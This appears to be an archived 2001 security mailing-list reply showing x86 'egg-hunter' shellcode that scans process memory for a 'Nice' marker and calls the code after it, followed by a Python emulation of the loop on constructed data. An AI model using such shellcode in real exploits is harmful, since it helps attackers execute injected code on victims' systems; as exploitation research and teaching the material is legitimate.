I wrote this code for the null printer exploit, to search for "Nice" in memory, starting from 0F0000h. It's very simple but it works. The string looks like this in memory:

    ...."Nicedata: [code]"....

    shell_code_start:
        mov eax, 0ffffffffh          ; set
        sub eax, 0fff0ffffh          ; eax to 0F0000h
    search_loop:
        inc eax                      ; eax=eax+1
        cmp dword ptr [eax], 'eciN'  ; is it "Nice"?
        jne search_loop              ; no, it isn't...loop
        add eax, 5                   ; skip some
        add eax, 5                   ; bytes
        call eax                     ; call the found code

Well in this case I don't get segfaults, that area is valid. If you know the range of where the string could be (like in this case, I found the address using windbg), you can start searching from there. If you wanna go complex, you can handle the exceptions (iczelion tutorials cover them, I think). Hope it helps some way... Good luck

----- Original Message -----
From: "Franklin DeMatto" <franklin.listsat_private>
To: <vuln-devat_private>
Sent: Saturday, October 13, 2001 11:32 PM
Subject: searching through the address space of a process

> Is there a way for a process (i.e., shellcode) to search through its
> address space (looking for a particular string, etc.)? I'm interested
> particularly in doing this under Windows, although Unix would be nice
> also. Can this be done without using any API/syscalls, just in assembly alone?
>
> I can see two basic ways of doing it:
> 1) Determining the address space, and then searching it
> 2) Trying every block, but catching the gpf/segfault exceptions
>
> However, I do not know how to implement either one
>
> Franklin
>
>
>
> Franklin DeMatto
> Senior Analyst, qDefense Penetration Testing
> http://qDefense.com
> qDefense: Making Security Accessible
>
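As an added illustration (not code from the original post), here is a Python emulation of that search loop run over a constructed memory image. It shows why the 'eciN' immediate matches the bytes "Nice" once stored little-endian, why the dword compare does not trip on a partial "Nic", where the two add eax, 5 land, and what happens when the scan runs past valid memory; the base address, marker and payload bytes are all constructed for the example.

```python
import struct

# Constructed stand-in for the process address space starting at 0F0000h:
# filler, a near-miss "Nic", the "Nicedata: " marker, then placeholder
# bytes standing in for "[code]".
BASE = 0x0F0000
MARKER = b"Nicedata: "
FAKE_CODE = b"\xcc" * 4  # placeholder, not real code
MEMORY = (b"\x00" * 0x40) + b"Nic" + (b"\x00" * 0x20) + MARKER + FAKE_CODE + (b"\x00" * 0x10)


def initial_eax() -> int:
    """mov eax, 0ffffffffh / sub eax, 0fff0ffffh, with 32-bit wraparound."""
    return (0xFFFFFFFF - 0x0FFF0FFFF) & 0xFFFFFFFF


def egg_immediate() -> int:
    """MASM's 'eciN' packs the first character into the most significant byte."""
    return int.from_bytes(b"eciN", "big")


def egg_bytes() -> bytes:
    """The same immediate as it sits in memory (little-endian): the bytes 'Nice'."""
    return struct.pack("<I", egg_immediate())


def search(memory: bytes, base: int, start: int) -> int:
    """Emulate search_loop: step eax one byte at a time, compare the dword at
    [eax] with the immediate, and return the address the loop would call."""
    egg = egg_bytes()
    eax = start - 1  # the loop executes inc eax before the first compare
    while True:
        eax += 1
        off = eax - base
        if off < 0 or off + 4 > len(memory):
            # The real loop has no bound: here it would touch unmapped memory
            # and fault, which is the segfault case the reply talks about.
            raise LookupError("scan ran off the end of the emulated image")
        if memory[off:off + 4] == egg:
            # add eax, 5 twice: skip "Nice" plus "data: " (10 bytes) to reach [code]
            return eax + 5 + 5


if __name__ == "__main__":
    found = search(MEMORY, BASE, initial_eax())
    print(hex(found), MEMORY[found - BASE:found - BASE + 4])
```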
This archive was generated by hypermail 2b30 : Mon Oct 15 2001 - 13:12:40 PDT